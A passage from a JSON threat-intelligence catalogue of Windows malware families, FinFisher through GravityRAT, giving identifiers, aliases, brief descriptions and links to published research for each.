"https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", 
"https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" ], "synonyms": [ "FinSpy" ], "type": [] }, "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", "value": "FinFisher RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" ], "synonyms": [], "type": [] }, "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", "value": "Fireball" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" ], "synonyms": [], "type": [] }, "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", "value": "FireCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", "value": "FireMalv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", "https://twitter.com/JaromirHorejsi/status/815949909648150528" ], "synonyms": [], "type": [] }, "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", 
"https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" ], "synonyms": [], "type": [] }, "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", "http://adelmas.com/blog/flokibot.php", "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/", "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/" ], "synonyms": [], "type": [] }, "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" ], "synonyms": [], "type": [] }, "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", "value": "Floxif" }, { "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. 
Flusihoc communicates with its C2 via HTTP in plain text.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" ], "synonyms": [], "type": [] }, "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", "value": "Flusihoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" ], "synonyms": [], "type": [] }, "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", "value": "Fobber" }, { "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. 
It was initially called \"Babushka Crypter\" by Insidemalware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent", "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" ], "synonyms": [], "type": [] }, "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", "value": "Formbook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" ], "synonyms": [ "ffrat" ], "type": [] }, "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", "value": "FormerFirstRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", "value": "Freenki Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", 
"https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [ "BitPaymer" ], "type": [] }, "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", "value": "FriedEx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", "https://sentinelone.com/blogs/sfg-furtims-parent/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f" ], "synonyms": [], "type": [] }, "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", "value": "Furtim" }, { "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" ], "synonyms": [], "type": [] }, "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", "value": "GalaxyLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" ], "synonyms": [ "pios" ], "type": [] }, "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", "value": "gamapos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" ], "synonyms": [], "type": [] }, "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", "value": "Gameover DGA" }, { "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. 
According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf", "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", "https://www.wired.com/?p=2171700", "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf" ], "synonyms": [ "GOZ", "ZeuS P2P" ], "type": [] }, "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", "value": "Gameover P2P" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" ], "synonyms": [], "type": [] }, "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", "value": "Gamotrol" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", "http://asec.ahnlab.com/1145", "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", "https://isc.sans.edu/diary/23417", "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", 
"http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/", "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom" ], "synonyms": [ "GrandCrab" ], "type": [] }, "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", "value": "Gandcrab" }, { "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" ], "synonyms": [], "type": [] }, "uuid": "591b2882-65ba-4629-9008-51ed3467510a", "value": "Gaudox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" ], "synonyms": [], "type": [] }, "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", "value": "Gauss" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", "https://securelist.com/introducing-whitebear/81638/", "https://www.youtube.com/watch?v=Pvzhtjl86wc", "https://github.com/eset/malware-ioc/tree/master/turla", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf" ], "synonyms": [ "WhiteBear" ], "type": [] }, "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", "value": "Gazer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" ], 
"synonyms": [], "type": [] }, "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", "value": "gcman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", "https://www.rekings.com/ispy-customers/", "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html" ], "synonyms": [], "type": [] }, "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", "value": "GearInformer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", "https://www.us-cert.gov/ncas/alerts/TA18-201A", "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", "https://feodotracker.abuse.ch/?filter=version_e", "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", 
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" ], "synonyms": [ "Emotet", "Heodo" ], "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", "value": "Geodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", "value": "GetMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware" ], "synonyms": [ "getmypos" ], "type": [] }, "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", "https://www.coresecurity.com/core-impact" ], "synonyms": [ "CoreImpact (Modified)" ], "type": [] }, "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", "value": "Ghole" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", 
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ "Remosh" ], "type": [] }, "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", "value": "Gh0stnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" ], "synonyms": [ "Ghost iBot" ], "type": [] }, "uuid": "6201c337-1599-4ced-be9e-651a624c20be", "value": "GhostAdmin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", "https://blog.cylance.com/the-ghost-dragon" ], "synonyms": [ "Gh0st RAT", "PCRat" ], "type": [] }, "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", "value": "Ghost RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", "https://forum.exploit.in/pda/index.php/t102378.html" ], "synonyms": [ "Wordpress Bruteforcer" ], "type": [] }, "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", "value": "Glasses" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", 
"https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" ], "synonyms": [], "type": [] }, "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", "value": "GlassRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", "https://isc.sans.edu/diary/23417", "https://blog.ensilo.com/globeimposter-ransomware-technical", "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet" ], "synonyms": [], "type": [] }, "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", "value": "GlobeImposter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" ], "synonyms": [], "type": [] }, "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", "value": "Globe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", "value": "GlooxMail" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", "http://resources.infosecinstitute.com/tdss4-part-1/", "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", 
"https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/" ], "synonyms": [], "type": [] }, "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" ], "synonyms": [], "type": [] }, "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", "value": "Godzilla Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", "value": "Goggles" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html" ], "synonyms": [ "Petya/Mischa" ], "type": [] }, "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", "value": "GoldenEye" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", "value": "GoldDragon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], "type": [] }, "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, { "description": "", 
"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ "Fuerboos" ], "type": [] }, "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", "value": "Goodor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" ], "synonyms": [], "type": [] }, "uuid": "d1298818-6425-49be-9764-9f119d964efd", "value": "GoogleDrive RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" ], "synonyms": [], "type": [] }, "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", "value": "GooPic Drooper" }, { "description": "Gootkit is a banking trojan, large parts of which are written in JavaScript (Node.js). 
It jumps to C/C++-library functions for various tasks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", "https://www.youtube.com/watch?v=242Tn0IL2jE", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/" ], "synonyms": [ "Xswkit", "talalpek" ], "type": [] }, "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", "https://www.yumpu.com/en/document/view/55930175/govrat-v20" ], "synonyms": [], "type": [] }, "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", "value": "GovRAT" }, { "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka 
Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and is often classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://www.secureworks.com/research/gozi", "https://lokalhost.pl/gozi_tree.txt", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ "CRM", "Gozi CRM", "Papras", "Snifula", "Ursnif" ], "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", "value": "Gozi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", "value": "GPCode" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", 
"http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" ], "synonyms": [], "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", "value": "GrabBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" ], "synonyms": [], "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", "value": "Graftor" }, { "description": "POS malware targets systems that run physical point-of-sale devices and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as LogMeIn software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with a low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was uploaded in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" ], "synonyms": [ "FrameworkPOS", "trinity" ], "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", "value": "Grateful POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" ], "synonyms": [], "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", "value": "Gratem" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", 